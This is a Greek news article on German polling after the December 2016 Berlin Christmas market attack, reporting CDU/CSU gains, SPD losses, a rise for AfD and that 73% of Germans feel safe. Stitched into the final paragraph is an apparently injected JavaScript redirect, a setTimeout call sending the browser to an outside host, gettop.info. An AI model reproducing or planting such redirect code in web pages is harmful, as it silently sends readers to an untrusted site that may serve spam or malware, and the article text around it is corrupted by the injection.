Το μακελειό στο Βερολίνο δεν επηρέασε τη δημοφιλία της Μέρκελ – Ασφαλείς αισθάνονται οι Γερμανοί

0
9

 

Αυξήθηκε η δημοτικότητα των Χριστιανοδημοκρατών, παρά την τρομοκρατική επίθεση στη χριστουγεννιάτικη αγορά του Βερολίνου στις 19 Δεκεμβρίου, καθώς η πλειονότητα των Γερμανών δεν ανησυχεί για την τρομοκρατία.

Η δημοτικότητα του CDU και των Χριστιανοκοινωνιστών (CSU), αυξήθηκε κατά δύο μονάδες σε σχέση με έναν μήνα πριν, φτάνοντας στο 37%, σύμφωνα με δημοσκόπηση από το Infratest dimap για το κρατικό τηλεοπτικό δίκτυο ARD, που έγινε από τις 2-4 Ιανουαρίου.

Ωστόσο, οι Σοσιαλδημοκράτες (SPD), εταίροι της Μέρκελ στον κυβερνητικό συνασπισμό, είδαν τη δημοτικότητά τους να μειώνεται κατά 2 μονάδες, στο 20%, ενώ το ακροδεξιό, αντιμεταναστευτικό κόμμα Εναλλακτική για τη Γερμανία (AfD) κέρδισε δύο μονάδες και πλέον βρίσκεται στο 15%.

Σε ξεχωριστή δημοσκόπηση επίσης του Infratest dimap για το ARD φαίνεται ότι το 73% των Γερμανών αισθάνονται ασφαλείς, παρά την επίθεση. Εξαίρεση αποτελούν οι υποστηρικτές του AfD, με τα δύο τρίτα εξ αυτών να δηλώνουν ανασφαλείς. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here